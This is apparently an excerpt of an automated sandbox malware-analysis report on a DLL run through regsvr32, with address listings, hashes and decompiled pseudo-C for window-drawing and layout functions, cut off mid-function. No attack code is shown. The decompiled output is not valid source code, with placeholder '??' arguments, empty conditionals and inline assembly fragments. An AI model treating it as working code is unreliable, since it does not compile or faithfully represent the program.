                                                                              0x10048f07
                                                                              0x10048f09
                                                                              0x10048f0c
                                                                              0x10048f0e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10048f10
                                                                              0x10048f13
                                                                              0x10048f17
                                                                              0x10048f19
                                                                              0x10048f1b
                                                                              0x10048f1e
                                                                              0x10048f22
                                                                              0x10048f25
                                                                              0x10048f25
                                                                              0x10048f25
                                                                              0x10048f29
                                                                              0x10048f2d
                                                                              0x10048f2f
                                                                              0x10048f33
                                                                              0x10048f33
                                                                              0x10048f41
                                                                              0x10048f49
                                                                              0x10048f4c
                                                                              0x10048f51
                                                                              0x10048f5a
                                                                              0x10048f64
                                                                              0x10048f6a
                                                                              0x10048f6c
                                                                              0x10048fa6
                                                                              0x00000000
                                                                              0x10048fa6
                                                                              0x10048f6e
                                                                              0x10048f73
                                                                              0x10048f7b
                                                                              0x10048f7e
                                                                              0x10048f81
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10048f89
                                                                              0x10048f93
                                                                              0x10048f93
                                                                              0x00000000
                                                                              0x10048f9b
                                                                              0x10048c34
                                                                              0x10048c3b
                                                                              0x10048c40
                                                                              0x10048c47
                                                                              0x10048c4e
                                                                              0x10048c55
                                                                              0x10048c5a
                                                                              0x10048c5d
                                                                              0x10048c63
                                                                              0x10048c65
                                                                              0x10048ed2
                                                                              0x00000000
                                                                              0x10048ed2
                                                                              0x10048c6b
                                                                              0x10048c6d
                                                                              0x10048c78
                                                                              0x10048c78
                                                                              0x10048c7e
                                                                              0x10048c80
                                                                              0x10048c84
                                                                              0x10048c87
                                                                              0x10048c8b
                                                                              0x10048c8e
                                                                              0x10048eb6
                                                                              0x00000000
                                                                              0x10048eb6
                                                                              0x10048c94
                                                                              0x10048ca0
                                                                              0x10048ca0
                                                                              0x10048ca3
                                                                              0x10048e00
                                                                              0x10048e04
                                                                              0x10048e0c
                                                                              0x10048e0c
                                                                              0x10048e0f
                                                                              0x10048e12
                                                                              0x10048e16
                                                                              0x10048e1b
                                                                              0x10048e1f
                                                                              0x10048e1f
                                                                              0x10048e23
                                                                              0x10048e23
                                                                              0x10048e27
                                                                              0x10048e2f
                                                                              0x10048e2f
                                                                              0x10048e34
                                                                              0x10048e39
                                                                              0x10048e3e
                                                                              0x10048eae
                                                                              0x00000000
                                                                              0x10048eae
                                                                              0x10048e40
                                                                              0x10048e44
                                                                              0x10048e47
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10048e49
                                                                              0x10048e4d
                                                                              0x10048e54
                                                                              0x10048e59
                                                                              0x10048e5e
                                                                              0x10048ea0
                                                                              0x00000000
                                                                              0x10048ea0
                                                                              0x10048e60
                                                                              0x10048e64
                                                                              0x10048e64
                                                                              0x00000000
                                                                              0x10048e64
                                                                              0x10048e29
                                                                              0x10048e2d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10048e2d
                                                                              0x10048e06
                                                                              0x10048e0a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10048e0a
                                                                              0x10048ca9
                                                                              0x10048cac
                                                                              0x10048caf
                                                                              0x10048cb2
                                                                              0x10048cb6
                                                                              0x10048cbb
                                                                              0x10048cbd
                                                                              0x10048ce5
                                                                              0x10048ce8
                                                                              0x10048cec
                                                                              0x10048cd5
                                                                              0x10048cd5
                                                                              0x00000000
                                                                              0x10048cd5
                                                                              0x10048cf3
                                                                              0x10048cf9
                                                                              0x10048cfc
                                                                              0x10048d01
                                                                              0x10048d04
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10048d06
                                                                              0x10048d06
                                                                              0x10048d0a
                                                                              0x10048d0c
                                                                              0x10048d11
                                                                              0x10048d17
                                                                              0x10048d1c
                                                                              0x10048d21
                                                                              0x10048d26
                                                                              0x10048d28
                                                                              0x10048d2b
                                                                              0x10048d33
                                                                              0x10048d38
                                                                              0x10048d3c
                                                                              0x10048d42
                                                                              0x10048d44
                                                                              0x10048d47
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10048d55
                                                                              0x10048d5e
                                                                              0x10048d63
                                                                              0x10048d68
                                                                              0x10048d6c
                                                                              0x10048d6f
                                                                              0x10048d78
                                                                              0x10048d7e
                                                                              0x10048d80
                                                                              0x10048e92
                                                                              0x00000000
                                                                              0x10048e92
                                                                              0x10048d86
                                                                              0x10048d8a
                                                                              0x10048d8d
                                                                              0x10048d90
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10048d96
                                                                              0x10048d99
                                                                              0x10048df9
                                                                              0x00000000
                                                                              0x10048df9
                                                                              0x10048da0
                                                                              0x10048db0
                                                                              0x10048db5
                                                                              0x10048dba
                                                                              0x10048dbe
                                                                              0x10048dc3
                                                                              0x10048dc9
                                                                              0x10048dd2
                                                                              0x10048dd8
                                                                              0x10048dda
                                                                              0x10048e84
                                                                              0x00000000
                                                                              0x10048e84
                                                                              0x10048de0
                                                                              0x10048de5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10048deb
                                                                              0x10048df0
                                                                              0x10048df3
                                                                              0x00000000
                                                                              0x10048df3
                                                                              0x10048cbf
                                                                              0x10048cbf
                                                                              0x10048cc8
                                                                              0x10048ccb
                                                                              0x10048cd0
                                                                              0x10048cd3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10048e67
                                                                              0x10048e6c
                                                                              0x10048e6c
                                                                              0x10048e74
                                                                              0x00000000
                                                                              0x10048e74
                                                                              0x10048c6f
                                                                              0x10048c72
                                                                              0x10048ec9
                                                                              0x00000000
                                                                              0x10048ec9
                                                                              0x00000000
                                                                              0x10048c72
                                                                              0x10048c17
                                                                              0x10048bcc
                                                                              0x10048bd3
                                                                              0x10048bd5
                                                                              0x10048bda
                                                                              0x10048bdd
                                                                              0x10048be2
                                                                              0x10048be4
                                                                              0x10048bea
                                                                              0x10048bef
                                                                              0x00000000
                                                                              0x10048bef
                                                                              0x10048bbe
                                                                              0x10048bc2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10048bc2
                                                                              0x10048b45
                                                                              0x10048b4a
                                                                              0x10048b4c
                                                                              0x10048b51
                                                                              0x10048b54
                                                                              0x10048b59
                                                                              0x10048b5b
                                                                              0x10048b61
                                                                              0x10048b66
                                                                              0x00000000
                                                                              0x10048b6b
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8fc14a30067a034140e951acd5c79994625fd92397d04f4202ce6b7c39831801
                                                                              • Instruction ID: 24f038f7c79de93dad933eb93da2faa8f17b5b6286bc5bf8ee0506c8c84ff306
                                                                              • Opcode Fuzzy Hash: 8fc14a30067a034140e951acd5c79994625fd92397d04f4202ce6b7c39831801
                                                                              • Instruction Fuzzy Hash: C4120176704B8186DB20CF29E84439E77A1F789B84F620536EE8AC7768DF79C544CB08
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1002A0B0 Relevance: 27.2, APIs: 18, Instructions: 223windowCOMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 40%
                                                                              			E1002A0B0(signed int __ebx, void* __ecx, intOrPtr* __rcx, void* __rdx, long long __r8, void* __r9, void* __r11) {
				intOrPtr _t162;
				intOrPtr _t164;
				int _t165;
				void* _t168;
				intOrPtr _t169;
				intOrPtr _t214;
				struct tagRECT* _t229;
				intOrPtr _t231;
				struct tagRECT* _t233;
				intOrPtr* _t234;
				int _t236;
				void* _t237;
				intOrPtr _t239;
				void* _t240;
				intOrPtr _t244;
				RECT* _t251;

				_t247 = __r11;
				_t246 = __r9;
				 *((long long*)(_t239 + 0x18)) = __r8;
				_t162 = _t239;
				_t240 = _t239 - 0xa0;
				 *((long long*)(_t240 + 0x30)) = 0xfffffffe;
				_t237 = __r9;
				_t234 = __rcx;
				 *((long long*)(_t162 - 0x10)) = 0;
				 *((long long*)(_t162 - 0x18)) = 0x100551a8;
				 *((long long*)(_t162 - 0x20)) = 0;
				 *((long long*)(_t162 - 0x28)) = 0x100551a8;
				 *((long long*)(_t162 - 0x30)) = 0;
				 *((long long*)(_t162 - 0x38)) = 0x100551a8;
				CreateRectRgnIndirect(_t251);
				E1000CE50(__ebx, _t162, _t240 + 0x78, _t162, __r11);
				CopyRect(_t229);
				r8d =  *(_t240 + 0xe4);
				r8d =  ~r8d;
				_t130 =  ~__ebx;
				InflateRect(_t233, _t236, _t165);
				IntersectRect(??, ??, ??);
				CreateRectRgnIndirect(??);
				E1000CE50( ~__ebx, _t162, _t240 + 0x68, _t162, __r11);
				r9d = 0;
				r8d = 0;
				_t142 = 0;
				CreateRectRgn(??, ??, ??, ??);
				E1000CE50( ~__ebx, _t162, _t240 + 0x88, _t162, __r11);
				r9d = 3;
				_t244 =  *((intOrPtr*)(_t240 + 0x70));
				_t214 =  *((intOrPtr*)(_t240 + 0x80));
				CombineRgn(??, ??, ??, ??);
				_t231 =  *((intOrPtr*)(_t240 + 0xf8));
				if(_t231 == 0) {
					E10029FD8(_t214, _t244, __r9);
					_t231 = _t162;
				}
				if((0 | _t231 != 0x00000000) == 0) {
					E10016544();
					asm("int3");
				}
				_t168 =  ==  ? _t231 :  *((intOrPtr*)(_t240 + 0x100));
				 *((long long*)(_t240 + 0x60)) = 0;
				 *((long long*)(_t240 + 0x58)) = 0x100551a8;
				 *((long long*)(_t240 + 0x50)) = 0;
				 *((long long*)(_t240 + 0x48)) = 0x100551a8;
				if(_t237 != 0) {
					r9d = 0;
					r8d = 0;
					CreateRectRgn(??, ??, ??, ??);
					E1000CE50(_t130, _t162, _t240 + 0x58, _t162, _t247);
					r11d =  *((intOrPtr*)(_t237 + 0xc));
					 *((intOrPtr*)(_t240 + 0x20)) = r11d;
					r9d =  *((intOrPtr*)(_t237 + 8));
					r8d =  *(_t237 + 4);
					SetRectRgn(??, ??, ??, ??, ??);
					CopyRect(??, ??);
					r8d =  *(_t240 + 0xf4);
					r8d =  ~r8d;
					InflateRect(??, ??, ??);
					IntersectRect(??, ??, ??);
					r11d =  *((intOrPtr*)(_t240 + 0x44));
					 *((intOrPtr*)(_t240 + 0x20)) = r11d;
					r9d =  *((intOrPtr*)(_t240 + 0x40));
					r8d =  *(_t240 + 0x3c);
					_t142 =  *((intOrPtr*)(_t240 + 0x38));
					SetRectRgn(??, ??, ??, ??, ??);
					r9d = 3;
					_t244 =  *((intOrPtr*)(_t240 + 0x70));
					CombineRgn(??, ??, ??, ??);
					_t250 =  *((intOrPtr*)(_t168 + 8));
					if( *((intOrPtr*)(_t231 + 8)) ==  *((intOrPtr*)(_t168 + 8))) {
						r9d = 0;
						r8d = 0;
						_t142 = 0;
						CreateRectRgn(??, ??, ??, ??);
						E1000CE50(_t130, _t162, _t240 + 0x48, _t162, _t250);
						r9d = 3;
						_t244 =  *((intOrPtr*)(_t240 + 0x90));
						CombineRgn(??, ??, ??, ??);
					}
				}
				_t163 =  *((intOrPtr*)(_t168 + 8));
				r13d = 0x5a0049;
				if( *((intOrPtr*)(_t231 + 8)) !=  *((intOrPtr*)(_t168 + 8)) && _t237 != 0) {
					E1000C758(_t234, _t240 + 0x58);
					 *((intOrPtr*)( *_t234 + 0xa0))();
					E1000CF7C(_t142, _t234, _t168, _t244, _t246,  *_t234);
					r8d =  *(_t240 + 0x3c);
					r9d =  *((intOrPtr*)(_t240 + 0x40));
					_t142 =  *((intOrPtr*)(_t240 + 0x38));
					r9d = r9d -  *((intOrPtr*)(_t240 + 0x38));
					 *((intOrPtr*)(_t240 + 0x28)) = r13d;
					 *((intOrPtr*)(_t240 + 0x20)) =  *((intOrPtr*)(_t240 + 0x44)) - r8d;
					PatBlt(??, ??, ??, ??, ??, ??);
					E1000CF7C( *((intOrPtr*)(_t240 + 0x38)), _t234, _t163, _t244, _t246,  *_t234);
				}
				_t164 = _t240 + 0x88;
				_t216 =  ==  ? _t164 : _t240 + 0x48;
				E1000C758(_t234,  ==  ? _t164 : _t240 + 0x48);
				_t248 =  *_t234;
				 *((intOrPtr*)( *_t234 + 0xa0))();
				_t218 = _t231;
				E1000CF7C(_t142, _t234, _t231, _t244, _t246,  *_t234);
				_t169 = _t164;
				r8d =  *(_t240 + 0x3c);
				r9d =  *((intOrPtr*)(_t240 + 0x40));
				_t143 =  *((intOrPtr*)(_t240 + 0x38));
				r9d = r9d -  *((intOrPtr*)(_t240 + 0x38));
				 *((intOrPtr*)(_t240 + 0x28)) = r13d;
				 *((intOrPtr*)(_t240 + 0x20)) =  *((intOrPtr*)(_t240 + 0x44)) - r8d;
				PatBlt(??, ??, ??, ??, ??, ??);
				if(_t169 != 0) {
					_t218 = _t169;
					E1000CF7C(_t143, _t234, _t169, _t244, _t246, _t248);
				}
				E1000C758(_t234, _t218);
				 *((long long*)(_t240 + 0x48)) = 0x10055188;
				E1000CECC(_t164, _t240 + 0x48);
				 *((long long*)(_t240 + 0x58)) = 0x10055188;
				E1000CECC(_t164, _t240 + 0x58);
				 *((long long*)(_t240 + 0x68)) = 0x10055188;
				E1000CECC(_t164, _t240 + 0x68);
				 *((long long*)(_t240 + 0x78)) = 0x10055188;
				E1000CECC(_t164, _t240 + 0x78);
				 *((long long*)(_t240 + 0x88)) = 0x10055188;
				return E1000CECC(_t164, _t240 + 0x88);
			}



















                                                                              0x1002a0b0
                                                                              0x1002a0b0
                                                                              0x1002a0b0
                                                                              0x1002a0bb
                                                                              0x1002a0be
                                                                              0x1002a0c5
                                                                              0x1002a0ce
                                                                              0x1002a0d7
                                                                              0x1002a0da
                                                                              0x1002a0e9
                                                                              0x1002a0ed
                                                                              0x1002a0f5
                                                                              0x1002a0f9
                                                                              0x1002a101
                                                                              0x1002a108
                                                                              0x1002a116
                                                                              0x1002a123
                                                                              0x1002a129
                                                                              0x1002a131
                                                                              0x1002a134
                                                                              0x1002a13d
                                                                              0x1002a150
                                                                              0x1002a15b
                                                                              0x1002a169
                                                                              0x1002a16e
                                                                              0x1002a171
                                                                              0x1002a174
                                                                              0x1002a178
                                                                              0x1002a189
                                                                              0x1002a18e
                                                                              0x1002a194
                                                                              0x1002a199
                                                                              0x1002a1a9
                                                                              0x1002a1af
                                                                              0x1002a1ba
                                                                              0x1002a1bc
                                                                              0x1002a1c1
                                                                              0x1002a1c1
                                                                              0x1002a1ce
                                                                              0x1002a1d0
                                                                              0x1002a1d5
                                                                              0x1002a1d5
                                                                              0x1002a1e1
                                                                              0x1002a1e5
                                                                              0x1002a1ee
                                                                              0x1002a1f3
                                                                              0x1002a1fc
                                                                              0x1002a204
                                                                              0x1002a20a
                                                                              0x1002a20d
                                                                              0x1002a214
                                                                              0x1002a222
                                                                              0x1002a227
                                                                              0x1002a22b
                                                                              0x1002a230
                                                                              0x1002a234
                                                                              0x1002a243
                                                                              0x1002a251
                                                                              0x1002a257
                                                                              0x1002a25f
                                                                              0x1002a270
                                                                              0x1002a283
                                                                              0x1002a289
                                                                              0x1002a28e
                                                                              0x1002a293
                                                                              0x1002a298
                                                                              0x1002a29d
                                                                              0x1002a2a6
                                                                              0x1002a2ac
                                                                              0x1002a2b2
                                                                              0x1002a2c4
                                                                              0x1002a2ca
                                                                              0x1002a2d2
                                                                              0x1002a2d4
                                                                              0x1002a2d7
                                                                              0x1002a2da
                                                                              0x1002a2de
                                                                              0x1002a2ec
                                                                              0x1002a2f1
                                                                              0x1002a2f7
                                                                              0x1002a309
                                                                              0x1002a309
                                                                              0x1002a2d2
                                                                              0x1002a30f
                                                                              0x1002a313
                                                                              0x1002a31d
                                                                              0x1002a32c
                                                                              0x1002a33c
                                                                              0x1002a349
                                                                              0x1002a355
                                                                              0x1002a35d
                                                                              0x1002a362
                                                                              0x1002a366
                                                                              0x1002a369
                                                                              0x1002a36e
                                                                              0x1002a376
                                                                              0x1002a382
                                                                              0x1002a382
                                                                              0x1002a38c
                                                                              0x1002a39a
                                                                              0x1002a3a1
                                                                              0x1002a3a6
                                                                              0x1002a3b1
                                                                              0x1002a3b8
                                                                              0x1002a3be
                                                                              0x1002a3c3
                                                                              0x1002a3ca
                                                                              0x1002a3d2
                                                                              0x1002a3d7
                                                                              0x1002a3db
                                                                              0x1002a3de
                                                                              0x1002a3e3
                                                                              0x1002a3eb
                                                                              0x1002a3f4
                                                                              0x1002a3f6
                                                                              0x1002a3fc
                                                                              0x1002a3fc
                                                                              0x1002a406
                                                                              0x1002a413
                                                                              0x1002a41d
                                                                              0x1002a423
                                                                              0x1002a42d
                                                                              0x1002a433
                                                                              0x1002a43d
                                                                              0x1002a443
                                                                              0x1002a44d
                                                                              0x1002a453
                                                                              0x1002a475

                                                                              APIs
                                                                              • CreateRectRgnIndirect.GDI32 ref: 1002A108
                                                                              • CopyRect.USER32 ref: 1002A123
                                                                              • InflateRect.USER32 ref: 1002A13D
                                                                              • IntersectRect.USER32 ref: 1002A150
                                                                              • CreateRectRgnIndirect.GDI32 ref: 1002A15B
                                                                              • CreateRectRgn.GDI32 ref: 1002A178
                                                                              • CombineRgn.GDI32 ref: 1002A1A9
                                                                              • CreateRectRgn.GDI32 ref: 1002A214
                                                                              • SetRectRgn.GDI32 ref: 1002A243
                                                                              • CopyRect.USER32 ref: 1002A251
                                                                              • InflateRect.USER32 ref: 1002A270
                                                                              • IntersectRect.USER32 ref: 1002A283
                                                                              • SetRectRgn.GDI32 ref: 1002A2A6
                                                                              • CombineRgn.GDI32 ref: 1002A2C4
                                                                              • CreateRectRgn.GDI32 ref: 1002A2DE
                                                                              • CombineRgn.GDI32 ref: 1002A309
                                                                              • PatBlt.GDI32 ref: 1002A376
                                                                                • Part of subcall function 10029FD8: CreateBitmap.GDI32 ref: 1002A040
                                                                                • Part of subcall function 10029FD8: CreatePatternBrush.GDI32 ref: 1002A051
                                                                                • Part of subcall function 10029FD8: DeleteObject.GDI32 ref: 1002A061
                                                                                • Part of subcall function 1000CF7C: SelectObject.GDI32 ref: 1000CFA7
                                                                                • Part of subcall function 1000CF7C: SelectObject.GDI32 ref: 1000CFC2
                                                                                • Part of subcall function 1000C758: SelectClipRgn.GDI32 ref: 1000C782
                                                                                • Part of subcall function 1000C758: SelectClipRgn.GDI32 ref: 1000C79D
                                                                              • PatBlt.GDI32 ref: 1002A3EB
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$Create$Select$CombineObject$ClipCopyIndirectInflateIntersect$BitmapBrushDeletePattern
                                                                              • String ID:
                                                                              • API String ID: 1332805902-0
                                                                              • Opcode ID: 3e1d2ba9938bdd5632b5ba42fa52e0d6b2ab62a2258efb4330f80c11aef3ea7d
                                                                              • Instruction ID: 5550c897073d28307af8682703d2ed33691ea96c9d6b45f8de8777375f499943
                                                                              • Opcode Fuzzy Hash: 3e1d2ba9938bdd5632b5ba42fa52e0d6b2ab62a2258efb4330f80c11aef3ea7d
                                                                              • Instruction Fuzzy Hash: 25A14B3A318A8486EB20CF26F85479EB761F789BD4F505125EF8A47B68DF78C585CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10017064 Relevance: 23.1, APIs: 15, Instructions: 577COMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 49%
                                                                              			E10017064(void* __ebx, void* __edx, unsigned long long __rax, intOrPtr* __rcx, void* __rdx, unsigned long long __r9, void* __r12, void* __r13, void* __r14, signed int* __r15) {
				signed int _v56;
				signed int _v64;
				signed int _v76;
				signed int _v80;
				unsigned long long _v200;
				unsigned long long _v208;
				unsigned long long _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				long long _v240;
				intOrPtr _v244;
				signed int _v248;
				signed int _v252;
				char _v256;
				intOrPtr _v260;
				long long _v264;
				intOrPtr _v268;
				unsigned long long _v272;
				signed int _v276;
				signed int _v280;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				void* __rsi;
				void* __rbp;
				signed long long _t193;
				signed int _t197;
				signed int _t201;
				signed int _t205;
				void* _t209;
				signed char _t213;
				void* _t216;
				signed int _t222;
				signed int _t232;
				intOrPtr _t233;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				void* _t265;
				unsigned long long _t266;
				signed int _t267;
				signed int _t269;
				void* _t273;
				signed int _t274;
				intOrPtr _t279;
				void* _t284;
				void* _t289;
				signed int _t290;
				signed int _t291;
				signed int _t293;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t303;
				unsigned long long _t321;
				signed int _t323;
				unsigned long long _t328;
				intOrPtr _t330;
				long long _t331;
				unsigned long long _t332;
				signed long long _t335;
				signed long long _t337;
				unsigned long long _t342;
				unsigned long long _t368;
				signed long long _t374;
				void* _t376;
				signed long long _t377;
				long long _t383;
				long long _t386;
				intOrPtr* _t395;
				signed long long _t396;
				unsigned long long _t397;
				void* _t398;
				unsigned long long _t399;
				unsigned long long _t411;
				void* _t412;
				signed long long _t415;
				signed int* _t416;
				void* _t420;
				unsigned long long _t422;
				void* _t424;
				signed int* _t426;
				unsigned long long _t428;

				_t426 = __r15;
				_t424 = __r14;
				_t411 = __r9;
				_t376 = __rdx;
				_t333 = __rcx;
				_t321 = __rax;
				_t273 = __edx;
				_t265 = __ebx;
				_push(__r12);
				_push(__r15);
				_t296 = r9d;
				_t420 = __rdx;
				_t395 = __rcx;
				if(__rcx == 0) {
					E10016544();
					asm("int3");
				}
				if(_t376 == 0) {
					E10016544();
					asm("int3");
				}
				_t193 = E10016A60(_t265, _t273, _t333, _t376, _t411, _t412);
				_t415 = _t193;
				if(_t193 <= 0) {
					_t193 = E10016544();
					asm("int3");
				}
				r15d = 1;
				if(_t296 != r15d) {
					L23:
					_t20 = _t395 + 0x108; // 0x109
					_t408 = _t426;
					_t377 = _t415;
					E1002D82C(_t267, _t273, _t20, _t377, _t408);
					r11d = _t415 - 1;
					__eflags = r11d;
					_t335 = r11d;
					if(r11d < 0) {
						L42:
						E10016544();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_v56 = r9d;
						_v64 = r8d;
						_push(_t330);
						_push(_t398);
						_push(_t395);
						_push(_t415);
						_push(_t420);
						_push(_t424);
						_push(_t426);
						__eflags = _t335;
						r13d = r9d;
						r15d = r8d;
						_t416 = _t377;
						_t396 = _t335;
						if(_t335 == 0) {
							E10016544();
							asm("int3");
						}
						E10018958(_t377);
						_t197 = IsRectEmpty(??);
						_t337 = _t396;
						__eflags = _t197;
						if(_t197 != 0) {
							E10012624(_t321, _t337, _t377);
							__eflags = _t321;
							if(_t321 == 0) {
								E10016544();
								asm("int3");
							}
							_t337 =  *((intOrPtr*)(_t321 + 0x40));
							_t378 =  &_v256;
							GetClientRect(??, ??);
							r11d = _v248;
							r11d = r11d - _v256;
							_t201 = _v244 - _v252;
							__eflags = _t201;
						} else {
							asm("movdqu xmm0, [edi+0x134]");
							_t321 =  *_t396;
							_t378 =  &_v304;
							r8d = r13d;
							asm("movdqu [esp+0x20], xmm0");
							 *((intOrPtr*)(_t321 + 0x280))();
							r11d = _v296;
							r11d = r11d - _v304;
							_t201 = _v292 - _v300;
						}
						__eflags =  *(_t396 + 0x130);
						_v80 = r11d;
						_v76 = _t201;
						_t331 = _v80;
						_v264 = _t331;
						if( *(_t396 + 0x130) == 0) {
							_t202 = BeginDeferWindowPos();
						} else {
							_t202 = 0;
						}
						_t290 =  *0x10074c90; // 0x2
						_t297 =  *0x10074c94; // 0x2
						_t269 = 0;
						r14d = 0;
						_t291 =  ~_t290;
						_t298 =  ~_t297;
						__eflags =  *((intOrPtr*)(_t396 + 0x118)) - _t337;
						_v200 = _t321;
						_v288 = 0;
						_v280 = _t291;
						_v276 = _t298;
						_v80 = r14d;
						if( *((intOrPtr*)(_t396 + 0x118)) <= _t337) {
							L108:
							__eflags =  *(_t396 + 0x130);
							if( *(_t396 + 0x130) == 0) {
								__eflags = _t321;
								if(_t321 != 0) {
									EndDeferWindowPos();
								}
							}
							SetRectEmpty();
							r8d = r13d;
							 *((intOrPtr*)( *_t396 + 0x280))();
							__eflags = r15d;
							if(r15d == 0) {
								L113:
								_t205 =  *_t416;
								__eflags = _t205;
								if(_t205 != 0) {
									_t205 = _t205 - _v224 + _v232;
									__eflags = _t205;
									 *_t416 = _t205;
								}
							} else {
								__eflags = r13d;
								if(r13d == 0) {
									goto L113;
								}
							}
							__eflags = r15d;
							if(r15d == 0) {
								L117:
								_t205 = _t416[1];
								__eflags = _t205;
								if(_t205 != 0) {
									_t205 = _t205 - _v220 + _v228;
									__eflags = _t205;
									_t416[1] = _t205;
								}
							} else {
								__eflags = r13d;
								if(r13d != 0) {
									goto L117;
								}
							}
							return _t205;
						} else {
							_t63 = _t424 - 1; // -1
							_t428 = _t63;
							_v240 = 0xfffffff8;
							while(1) {
								_t274 = _t269;
								_t202 = L10016AB8(_t202, _t265, _t274, _t396, _t378, _t411);
								_t65 = _t428 + 1; // 0x0
								_t342 = _t65;
								__eflags = _t342;
								_t422 = _t321;
								_v208 = _t342;
								if(_t342 < 0) {
									break;
								}
								__eflags = _t342 -  *((intOrPtr*)(_t396 + 0x118));
								if(_t342 >=  *((intOrPtr*)(_t396 + 0x118))) {
									break;
								} else {
									_t378 = _v240 + 8;
									__eflags = _t422;
									_t323 =  *((intOrPtr*)(_t378 +  *((intOrPtr*)(_t396 + 0x110))));
									_v216 = _t378;
									if(_t422 == 0) {
										__eflags = _t323;
										if(_t323 != 0) {
											goto L105;
										} else {
											goto L121;
										}
										goto L106;
									} else {
										_t202 =  *((intOrPtr*)( *_t422 + 0x2a8))();
										__eflags = _t202;
										if(_t202 == 0) {
											L103:
											__eflags = _v80;
											if(_v80 == 0) {
												goto L104;
											}
											goto L105;
										} else {
											_t213 =  *(_t422 + 0xdc);
											__eflags = _t213 & 0x00000004;
											if((_t213 & 0x00000004) == 0) {
												L61:
												asm("inc ebp");
												r9d = r9d & 0xfffffffa;
												r9d = r9d + 0x10;
												__eflags = r9d;
											} else {
												__eflags = _t213 & 0x00000001;
												if(__eflags == 0) {
													goto L61;
												} else {
													r9d = 6;
												}
											}
											r8d = 0xffffffff;
											_t216 =  *((intOrPtr*)( *_t422 + 0x270))();
											_t328 = _v272;
											_t269 = _t328 + _t398;
											_t321 = _t328 >> 0x20;
											_v304 = _t291;
											_v296 = _t269;
											_v300 = _t269;
											_v292 = _t216 + _t269;
											GetWindowRect(??, ??);
											_t378 =  &_v256;
											E1000C7AC(__eflags, _t396, _t378);
											__eflags = _v56;
											if(_v56 == 0) {
												r8d = _v252;
												_t274 = _v300;
												__eflags = r8d - _t274;
												if(r8d > _t274) {
													__eflags =  *(_t396 + 0x100);
													if( *(_t396 + 0x100) == 0) {
														r8d = r8d - _t274;
														__eflags = 0;
														OffsetRect(??, ??, ??);
														_t274 = _v300;
													}
												}
												r8d = _v292;
												__eflags = r8d - _v260;
												if(r8d > _v260) {
													__eflags =  *(_t396 + 0x100);
													if( *(_t396 + 0x100) == 0) {
														r8d = r8d - _t274;
														r8d = r8d -  *0x10074c94;
														_t269 = _v260 - r8d;
														r8d = _t298;
														__eflags = _t269 - _t298;
														r8d =  >  ? _v260 - r8d : r8d;
														r8d = r8d - _t274;
														__eflags = 0;
														OffsetRect(??, ??, ??);
														_t274 = _v300;
													}
												}
												r8d = 0;
												__eflags = _v80 - r8d;
												if(_v80 == r8d) {
													__eflags = _t274 - _v260 -  *0x10074c94;
													if(_t274 < _v260 -  *0x10074c94) {
														goto L97;
													} else {
														_t342 = _v288;
														__eflags = _t269 - r8d;
														if(_t269 <= r8d) {
															goto L97;
														} else {
															__eflags = _t428 - _t408;
															if(_t428 < _t408) {
																goto L127;
															} else {
																__eflags = _t428 -  *((intOrPtr*)(_t396 + 0x118));
																if(_t428 >=  *((intOrPtr*)(_t396 + 0x118))) {
																	goto L127;
																} else {
																	_t321 =  *((intOrPtr*)(_t396 + 0x110));
																	_t383 = _v240;
